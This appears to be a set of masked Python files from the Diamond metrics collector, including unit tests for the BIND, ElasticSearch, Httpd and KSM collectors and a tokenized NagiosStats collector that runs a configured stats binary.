    packages=['<STR_LIT>', '<STR_LIT>'],
    author='<STR_LIT>',
    author_email='<STR_LIT>',
    url='<STR_LIT>',
    license='<STR_LIT>',
    description=DESCRIPTION,
    long_description=LONG_DESCRIPTION,
    platforms=['<STR_LIT>'],
    classifiers=CLASSIFIERS,
    install_requires=[
        '<STR_LIT>',
    ],
)
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from bind import BindCollector


class TestBindCollector(CollectorTestCase):
    """Tests for BindCollector against a canned BIND statistics fixture."""

    def setUp(self):
        config = get_collector_config('<STR_LIT>', {
            '<STR_LIT>': <NUM_LIT:10>,
        })
        self.collector = BindCollector(config, None)

    def test_import(self):
        self.assertTrue(BindCollector)

    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_real_data(self, publish_mock):
        # Serve the fixture instead of hitting a live BIND statistics port.
        patch_urlopen = patch('<STR_LIT>', Mock(
            return_value=self.getFixture('<STR_LIT>')))
        patch_urlopen.start()
        self.collector.collect()
        patch_urlopen.stop()
        # Expected metric values for the fixture above.
        # NOTE(review): entry count transcribed from the masked source —
        # verify against the original fixture.
        metrics = {
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>, '<STR_LIT>': <NUM_LIT>,
        }
        # Record this run as the documentation example for the collector.
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['<STR_LIT:path>'])
        self.assertPublishedMany(publish_mock, metrics)


if __name__ == "<STR_LIT:__main__>":
    unittest.main()
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from elasticsearch import ElasticSearchCollector


class TestElasticSearchCollector(CollectorTestCase):
    """Tests for ElasticSearchCollector: instance parsing plus fixture-driven
    collection for current, logstash-mode and legacy-0.90 cluster responses."""

    def setUp(self):
        config = get_collector_config('<STR_LIT>', {})
        self.collector = ElasticSearchCollector(config, None)

    def test_import(self):
        self.assertTrue(ElasticSearchCollector)

    def test_new__instances_default(self):
        # With no instance config the collector falls back to localhost.
        config = get_collector_config('<STR_LIT>', {})
        self.collector = ElasticSearchCollector(config, None)
        self.assertEqual(self.collector.instances, {'<STR_LIT>': ('<STR_LIT:127.0.0.1>', <NUM_LIT>)})

    def test_new__instances_single(self):
        # A single host string becomes the "default" instance.
        config = get_collector_config('<STR_LIT>', {
            '<STR_LIT>': '<STR_LIT>'})
        self.collector = ElasticSearchCollector(config, None)
        self.assertEqual(self.collector.instances, {'<STR_LIT:default>': ('<STR_LIT>', <NUM_LIT>)})

    def test_new__instances_multi(self):
        # Multiple entries are parsed into named (host, port) pairs.
        config = get_collector_config('<STR_LIT>', {
            '<STR_LIT>': [
                '<STR_LIT>',
                '<STR_LIT>',
                '<STR_LIT>',
            ]})
        self.collector = ElasticSearchCollector(config, None)
        self.assertEqual(self.collector.instances, {
            '<STR_LIT:default>': ('<STR_LIT>', <NUM_LIT>),
            '<STR_LIT:foo>': ('<STR_LIT>', <NUM_LIT>),
            '<STR_LIT:bar>': ('<STR_LIT>', <NUM_LIT>),
        })

    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_real_data(self, publish_mock):
        # One fixture per HTTP endpoint the collector hits, served in order.
        returns = [
            self.getFixture('<STR_LIT>'),
            self.getFixture('<STR_LIT>'),
            self.getFixture('<STR_LIT>'),
        ]
        urlopen_mock = patch('<STR_LIT>', Mock(
            side_effect=lambda *args: returns.pop(<NUM_LIT:0>)))
        self.collector.config['<STR_LIT>'] = True
        urlopen_mock.start()
        self.collector.collect()
        urlopen_mock.stop()
        # All three endpoints must have been fetched.
        self.assertEqual(urlopen_mock.new.call_count, <NUM_LIT:3>)
        metrics = {
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:4>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:4>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['<STR_LIT:path>'])
        self.assertPublishedMany(publish_mock, metrics)

    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_real_data_logstash_mode(self, publish_mock):
        returns = [
            self.getFixture('<STR_LIT>'),
            self.getFixture('<STR_LIT>'),
        ]
        urlopen_mock = patch('<STR_LIT>', Mock(
            side_effect=lambda *args: returns.pop(<NUM_LIT:0>)))
        self.collector.config['<STR_LIT>'] = True
        urlopen_mock.start()
        self.collector.collect()
        urlopen_mock.stop()
        self.assertEqual(urlopen_mock.new.call_count, <NUM_LIT:2>)
        metrics = {
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:3>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['<STR_LIT:path>'])
        self.assertPublishedMany(publish_mock, metrics)

    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_real_0_90_data(self, publish_mock):
        # Legacy 0.90 response format only needs two endpoints.
        returns = [
            self.getFixture('<STR_LIT>'),
            self.getFixture('<STR_LIT>'),
        ]
        urlopen_mock = patch('<STR_LIT>', Mock(
            side_effect=lambda *args: returns.pop(<NUM_LIT:0>)))
        urlopen_mock.start()
        self.collector.collect()
        urlopen_mock.stop()
        self.assertEqual(urlopen_mock.new.call_count, <NUM_LIT:2>)
        metrics = {
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:9>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:12>,
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['<STR_LIT:path>'])
        self.assertPublishedMany(publish_mock, metrics)

    @patch.object(Collector, '<STR_LIT>')
    def test_should_fail_gracefully(self, publish_mock):
        # A bad response must not publish anything (and must not raise).
        urlopen_mock = patch('<STR_LIT>', Mock(
            return_value=self.getFixture('<STR_LIT>')))
        urlopen_mock.start()
        self.collector.collect()
        urlopen_mock.stop()
        self.assertPublishedMany(publish_mock, {})

    @patch.object(Collector, '<STR_LIT>')
    def test_multi_instances_with_real_data(self, publish_mock):
        config = get_collector_config('<STR_LIT>', {
            '<STR_LIT>': [
                '<STR_LIT>',
                '<STR_LIT>',
            ]})
        self.collector = ElasticSearchCollector(config, None)
        self.assertEqual(len(self.collector.instances), <NUM_LIT:2>)
        # Two fixtures per instance, consumed in request order.
        returns = [
            self.getFixture('<STR_LIT>'),
            self.getFixture('<STR_LIT>'),
            self.getFixture('<STR_LIT>'),
            self.getFixture('<STR_LIT>'),
        ]
        urlopen_mock = patch('<STR_LIT>', Mock(
            side_effect=lambda *args: returns.pop(<NUM_LIT:0>)))
        urlopen_mock.start()
        self.collector.collect()
        urlopen_mock.stop()
        self.assertEqual(urlopen_mock.new.call_count, <NUM_LIT:4>)
        metrics = {
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:2>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:2>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:4>,
            '<STR_LIT>': <NUM_LIT:8>,
        }
        self.assertPublishedMany(publish_mock, metrics)


if __name__ == "<STR_LIT:__main__>":
    unittest.main()
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from httpd import HttpdCollector
import httplib


class TestHTTPResponse(httplib.HTTPResponse):
    """Stub HTTPResponse whose read()/headers are patched per test case."""

    def __init__(self):
        # Skip the real constructor: no socket is involved in these tests.
        pass

    def read(self):
        pass


class TestHttpdCollector(CollectorTestCase):
    """Tests for HttpdCollector URL parsing and mod_status scraping."""

    def setUp(self, config=None):
        # Allow individual tests to re-run setUp with a custom config dict.
        if config is None:
            config = get_collector_config('<STR_LIT>', {
                '<STR_LIT>': '<STR_LIT>',
                '<STR_LIT:url>': '<STR_LIT>'
            })
        else:
            config = get_collector_config('<STR_LIT>', config)
        self.collector = HttpdCollector(config, None)
        self.HTTPResponse = TestHTTPResponse()
        # Patch httplib at the class level so every connection the collector
        # opens returns our stub response.
        httplib.HTTPConnection.request = Mock(return_value=True)
        httplib.HTTPConnection.getresponse = Mock(
            return_value=self.HTTPResponse)

    def test_import(self):
        self.assertTrue(HttpdCollector)

    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_synthetic_data(self, publish_mock):
        self.setUp()
        # First pass primes the counters: nothing is published yet.
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_headers = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value={}))
        patch_headers.start()
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        self.assertPublishedMany(publish_mock, {})
        # Second pass with the follow-up fixture yields the deltas below.
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        patch_headers.stop()
        self.assertPublishedMany(publish_mock, {
            '<STR_LIT>': <NUM_LIT:100>,
            '<STR_LIT>': <NUM_LIT:10>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:6>,
            '<STR_LIT>': <NUM_LIT:4>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:2>,
            '<STR_LIT>': <NUM_LIT:3>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
        })

    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_real_data(self, publish_mock):
        self.setUp()
        # Same two-pass pattern as above, using captured mod_status output.
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_headers = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value={}))
        patch_headers.start()
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        self.assertPublishedMany(publish_mock, {})
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        patch_headers.stop()
        metrics = {
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:9>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:7>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
        }
        self.assertPublishedMany(publish_mock, metrics)

    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_multiple_servers(self, publish_mock):
        # Two configured servers publish the same metric set under each
        # server's nickname prefix.
        self.setUp(config={
            '<STR_LIT>': [
                '<STR_LIT>',
                '<STR_LIT>',
            ],
        })
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_headers = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value={}))
        patch_headers.start()
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        self.assertPublishedMany(publish_mock, {})
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        patch_headers.stop()
        metrics = {
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:9>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:7>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:9>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:7>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['<STR_LIT:path>'])
        self.assertPublishedMany(publish_mock, metrics)

    @patch.object(Collector, '<STR_LIT>')
    def test_issue_456(self, publish_mock):
        self.setUp(config={
            '<STR_LIT>': '<STR_LIT>',
        })
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_headers = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value={}))
        patch_headers.start()
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        self.assertPublishedMany(publish_mock, {})
        patch_read = patch.object(
            TestHTTPResponse,
            '<STR_LIT>',
            Mock(return_value=self.getFixture(
                '<STR_LIT>').getvalue()))
        patch_read.start()
        self.collector.collect()
        patch_read.stop()
        patch_headers.stop()
        metrics = {
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:1>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
            '<STR_LIT>': <NUM_LIT:0>,
        }
        self.assertPublishedMany(publish_mock, metrics)

    @patch.object(Collector, '<STR_LIT>')
    def test_issue_533(self, publish_mock):
        # URL string parsing: nickname plus URL.
        self.setUp(config={
            '<STR_LIT>': '<STR_LIT>',
        })
        expected_urls = {'<STR_LIT:localhost>': '<STR_LIT>'}
        self.assertEqual(self.collector.urls, expected_urls)

    @patch.object(Collector, '<STR_LIT>')
    def test_url_with_port(self, publish_mock):
        self.setUp(config={
            '<STR_LIT>': '<STR_LIT>',
        })
        expected_urls = {'<STR_LIT:localhost>': '<STR_LIT>'}
        self.assertEqual(self.collector.urls, expected_urls)

    @patch.object(Collector, '<STR_LIT>')
    def test_url_without_port(self, publish_mock):
        self.setUp(config={
            '<STR_LIT>': '<STR_LIT>',
        })
        expected_urls = {'<STR_LIT:localhost>': '<STR_LIT>'}
        self.assertEqual(self.collector.urls, expected_urls)

    @patch.object(Collector, '<STR_LIT>')
    def test_url_without_nickname(self, publish_mock):
        self.setUp(config={
            '<STR_LIT>': '<STR_LIT>',
        })
        expected_urls = {'<STR_LIT>': '<STR_LIT>'}
        self.assertEqual(self.collector.urls, expected_urls)

    @patch.object(Collector, '<STR_LIT>')
    def test_issue_538(self, publish_mock):
        # URL parsing must survive a config containing extra non-string keys.
        self.setUp(config={
            '<STR_LIT>': True,
            '<STR_LIT>': "<STR_LIT>",
            '<STR_LIT>': <NUM_LIT:2>,
            '<STR_LIT>': False,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT>': '<STR_LIT>',
        })
        expected_urls = {'<STR_LIT:localhost>': '<STR_LIT>'}
        self.assertEqual(self.collector.urls, expected_urls)


if __name__ == "<STR_LIT:__main__>":
    unittest.main()
import os
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from ksm import KSMCollector


class TestKSMCollector(CollectorTestCase):
    """Tests for KSMCollector against a synthetic sysfs-style fixture tree."""

    def setUp(self):
        # Point the collector at fixture files shipped next to this test.
        config = get_collector_config('<STR_LIT>', {
            '<STR_LIT>': <NUM_LIT:10>,
            '<STR_LIT>': os.path.dirname(__file__) + '<STR_LIT>'
        })
        self.collector = KSMCollector(config, None)

    def test_import(self):
        self.assertTrue(KSMCollector)

    @patch('<STR_LIT>', Mock(return_value=True))
    @patch.object(Collector, '<STR_LIT>')
    def test_should_work_with_synthetic_data(self, publish_mock):
        self.collector.collect()
        # Expected values derived from the fixture files above.
        metrics = {
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT>,
            '<STR_LIT>': <NUM_LIT:1.0>,
            '<STR_LIT>': <NUM_LIT>,
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['<STR_LIT:path>'])
        self.assertPublishedMany(publish_mock, metrics)


if __name__ == "<STR_LIT:__main__>":
    unittest.main()
<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> import subprocess <EOL> import os <EOL> from diamond . collector import str_to_bool <EOL> class NagiosStatsCollector ( diamond . collector . Collector ) : <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( NagiosStatsCollector , <EOL> self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( NagiosStatsCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' <EOL> } ) <EOL> return config <EOL> def collect ( self ) : <EOL> if ( not os . access ( self . config [ '<STR_LIT>' ] , os . X_OK ) <EOL> or ( str_to_bool ( self . config [ '<STR_LIT>' ] ) <EOL> and not os . access ( self . config [ '<STR_LIT>' ] , os . X_OK ) ) ) : <EOL> return <EOL> command = [ self . config [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , "<STR_LIT:U+002C>" . join ( self . config [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' ] <EOL> if str_to_bool ( self . config [ '<STR_LIT>' ] ) : <EOL> command . insert ( <NUM_LIT:0> , self . config [ '<STR_LIT>' ] ) <EOL> p = subprocess . 
Popen ( command , <EOL> stdout = subprocess . PIPE ) . communicate ( ) [ <NUM_LIT:0> ] [ : - <NUM_LIT:1> ] <EOL> for i , v in enumerate ( p . split ( "<STR_LIT:\n>" ) ) : <EOL> metric_name = self . config [ '<STR_LIT>' ] [ i ] <EOL> metric_value = int ( v ) <EOL> self . publish ( metric_name , metric_value ) </s>
